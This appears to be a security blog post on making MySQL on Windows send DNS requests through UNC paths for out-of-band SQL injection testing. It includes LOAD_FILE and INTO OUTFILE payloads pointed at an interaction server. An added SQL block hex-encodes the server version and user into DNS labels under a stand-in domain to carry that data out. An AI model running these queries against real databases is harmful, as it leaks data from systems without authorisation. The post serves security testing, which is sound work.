Out of Band Interactions with MySQL
I sometimes use the cheatsheets by pentestmonkey, and I noticed that the MySQL one lists making DNS requests as impossible, with a question mark.
DNS requests are used in OAST (Out-of-band Application Security Testing) techniques to infer that an application is vulnerable to SQL injection when in-band methods fail. Or, more simply, if we can make a server perform DNS lookups we have at least some degree of control over it.
I was pretty sure that MySQL had this capability, so I set about testing it. I am using the interaction servers at https://app.interactsh.com
MySQL on Windows
I installed MySQL on my Windows 11 host and set up the server. Testing confirmed that I was correct: there are two ways to make the server attempt an SMB connection to a UNC path, and because the hostname in that path has to be resolved before the connection can be made, each produces an associated DNS request.
load_file
The first is load_file. The syntax is simple:
SELECT LOAD_FILE('\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a');
The interaction server shows the resulting DNS lookup. If you leave the \\a off the end it doesn't work, because a UNC path needs both a hostname and a share name before MySQL will try to open it, so make sure to include it.
Note: the From IP address here isn't my IP address but one belonging to my ISP. The interaction server sees the recursive resolver that performed the lookup on the MySQL host's behalf, not the host itself.
into outfile
The second command looks like this:
select '' into outfile '\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a';
This will yield a hit on the interaction server like the one above.
It should be possible in some circumstances to extract information this way by running:
select version() into outfile '\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a';
This wasn't working for me, I think because the DNS request isn't being made directly but by some upstream server. Note also that with into outfile the selected value becomes the content of the file written over SMB; it never forms part of the DNS query, so only the hostname in the UNC path reaches the DNS side.
Be aware that for the above to work the account needs the FILE privilege and the secure_file_priv setting needs to be misconfigured: NULL disables load_file and into outfile entirely, and a directory value restricts them to that directory, which a UNC path is not inside of, so effectively it has to be empty. Since MySQL 5.7.6 it is non-empty by default, so I think seeing this in the wild is unlikely.
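The following is an added example, not code from the original post. It pulls together the checks a tester would run before trying either technique (secure_file_priv, FILE privilege, Windows build) and shows how to get the selected value into the DNS query rather than into the file, since only the hostname of the UNC path is ever resolved. The domain example-oast.test stands in for the interactsh domain, and the session is assumed to allow stacked queries or direct SQL access.

```sql
-- Added example (not from the original post). Assumptions: direct or stacked
-- SQL access to a Windows MySQL server, and example-oast.test stands in for
-- the interactsh domain.

-- 1. Preconditions. secure_file_priv: NULL disables LOAD_FILE/INTO OUTFILE,
--    a directory restricts them to that directory (a UNC path is outside it),
--    '' removes the restriction. The account also needs the FILE privilege.
SELECT @@secure_file_priv AS secure_file_priv,
       @@version_compile_os AS compiled_for;   -- 'Win64' on Windows builds
SHOW GRANTS FOR CURRENT_USER();                -- look for FILE or ALL PRIVILEGES

-- 2. Canary: the SMB connection attempt forces a DNS lookup of the hostname.
--    '\\\\' is two backslashes once MySQL has processed the string escapes.
SELECT LOAD_FILE('\\\\canary.example-oast.test\\a');

-- 3. Exfiltration: whatever is in the hostname is what the resolver sends.
--    HEX() keeps the label DNS-safe; SUBSTRING keeps it under the 63-char
--    label limit (30 bytes -> 60 hex characters).
SELECT LOAD_FILE(CONCAT('\\\\',
                        HEX(SUBSTRING(@@version, 1, 30)),
                        '.example-oast.test\\a'));

-- 4. INTO OUTFILE only accepts a literal filename, so build the statement
--    text and run it through PREPARE to get the same effect.
--    Eight backslashes here become four in @q, which the parser turns into two.
SET @q = CONCAT('SELECT ''x'' INTO OUTFILE ''\\\\\\\\',
                HEX(SUBSTRING(USER(), 1, 30)),
                '.example-oast.test\\\\a''');
PREPARE stmt FROM @q;
EXECUTE stmt;
DEALLOCATE PREPARE stmt;
```

On the interaction server the leaked value appears as the leftmost DNS label and is recovered by hex-decoding it. Step 3 is the more useful form in an injection context because it is a single expression; step 4 needs stacked queries.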
MySQL on Linux
I tried the methods above from a Linux installation. It seems like this is not possible on Linux, at least from my attempts here. That is expected: Linux has no notion of UNC paths at the filesystem layer, so \\host\share is treated as an ordinary (non-existent) filename and no SMB connection or DNS lookup is attempted.
Conclusion
It is possible to make DNS queries with MySQL on Windows. We can also point the UNC path at a local SMB server, for example impacket's smbserver.py, so this can be tested on internal networks where no outbound connections are allowed, although finding this in reality remains unlikely.